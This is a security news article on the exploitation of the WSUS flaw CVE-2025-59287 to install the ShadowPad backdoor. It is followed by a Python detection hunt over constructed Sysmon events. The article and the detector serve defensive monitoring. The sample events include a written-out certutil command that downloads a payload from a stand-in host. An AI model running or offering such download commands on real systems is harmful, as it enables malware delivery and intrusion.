ShadowPad Malware Exploits WSUS Vulnerability for Full System Access
A critical security flaw in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, has been actively exploited by cyber attackers to deploy the ShadowPad malware, granting them full system access. The vulnerability, a deserialization flaw, allows remote code execution with system-level privileges and poses a significant threat to organizations that rely on WSUS for system updates.
The exploitation process begins with attackers targeting Windows Servers that have WSUS enabled. By leveraging CVE-2025-59287, they gain initial access to the system. They then use PowerCat, an open-source PowerShell-based Netcat utility, to establish a command shell (CMD). This access enables them to download and install ShadowPad using built-in Windows utilities such as ‘certutil’ and ‘curl’.
ShadowPad, considered the successor to the PlugX malware, is a modular backdoor extensively used by Chinese state-sponsored hacking groups since its emergence in 2015. Its design allows for dynamic loading of additional plugins from a remote server, facilitating the harvesting of sensitive data from compromised networks.
In the documented attack, the adversaries exploited the WSUS vulnerability to execute Windows utilities like ‘curl.exe’ and ‘certutil.exe’. These tools contacted an external server to download and install ShadowPad. The malware employs DLL side-loading techniques, using a legitimate binary (‘ETDCtrlHelper.exe’) to execute a malicious DLL payload (‘ETDApix.dll’). This payload acts as a memory-resident loader, initiating the backdoor’s operations.
Once installed, ShadowPad launches its core module responsible for loading other embedded plugins into memory. It incorporates various anti-detection and persistence mechanisms to maintain its foothold within the system. Notably, this activity has not been attributed to any specific threat actor or group.
The rapid weaponization of the publicly released proof-of-concept (PoC) exploit code for CVE-2025-59287 underscores the critical nature of this vulnerability. Its exploitation allows remote code execution with system-level permissions, significantly amplifying the potential impact on affected systems.
Given the severity of this threat, organizations should promptly apply the security patches provided by Microsoft to mitigate the risk associated with CVE-2025-59287. Additionally, robust monitoring and detection, in particular of WSUS-hosted processes spawning command shells, of ‘certutil’ and ‘curl’ fetching content from external servers, and of the ‘ETDCtrlHelper.exe’ / ‘ETDApix.dll’ side-loading pair, can help identify and respond to such exploitation attempts effectively.
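As an added illustration of the monitoring described above (example code written for this page, not part of the original report or of any vendor tooling), the following Python hunt scans constructed Sysmon-style events for the chain the article describes: a WSUS-hosted parent spawning a shell, a certutil/curl download, and ETDCtrlHelper.exe loading ETDApix.dll. The parent process names (w3wp.exe, WsusService.exe), sample paths and the URL are assumptions, not indicators from the report.

```python
"""Hunt constructed Sysmon-style events (EventID 1 = process create,
EventID 7 = image load) for the WSUS-to-ShadowPad chain described above."""
import re

# Assumption (not stated on the page): WSUS runs inside an IIS worker
# process or its own service, so these stand in as the exploited parent.
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path (handles either slash)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(evt):
    """Return a list of (rule, detail) hits for one event dict."""
    hits = []
    if evt.get("EventID") == 1:
        image, parent = basename(evt["Image"]), basename(evt["ParentImage"])
        cmd = evt.get("CommandLine", "")
        url = URL_RE.search(cmd)
        if parent in WSUS_PARENTS and image in SHELLS:
            hits.append(("wsus_spawns_shell", f"{parent} -> {image}"))
        if image == "certutil.exe" and "urlcache" in cmd.lower() and url:
            hits.append(("certutil_download", url.group()))
        if image == "curl.exe" and url:
            hits.append(("curl_download", url.group()))
    elif evt.get("EventID") == 7:  # legitimate host binary loading the payload DLL
        if basename(evt["Image"]) == "etdctrlhelper.exe" and basename(evt["ImageLoaded"]) == "etdapix.dll":
            hits.append(("shadowpad_sideload", evt["ImageLoaded"]))
    return hits

def hunt(events):
    """Flatten hits across an event stream as (ProcessId, rule, detail)."""
    return [(e.get("ProcessId"), r, d) for e in events for r, d in classify(e)]

# Constructed sample telemetry (not from a real incident); one benign event last.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4100, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -urlcache -split -f http://EXAMPLE-C2.invalid/x.zip C:\\Users\\Public\\x.zip"},
    {"EventID": 7, "ProcessId": 4200, "Image": r"C:\Users\Public\ETDCtrlHelper.exe",
     "ImageLoaded": r"C:\Users\Public\ETDApix.dll"},
    {"EventID": 1, "ProcessId": 900, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for pid, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"pid={pid} rule={rule} detail={detail}")
```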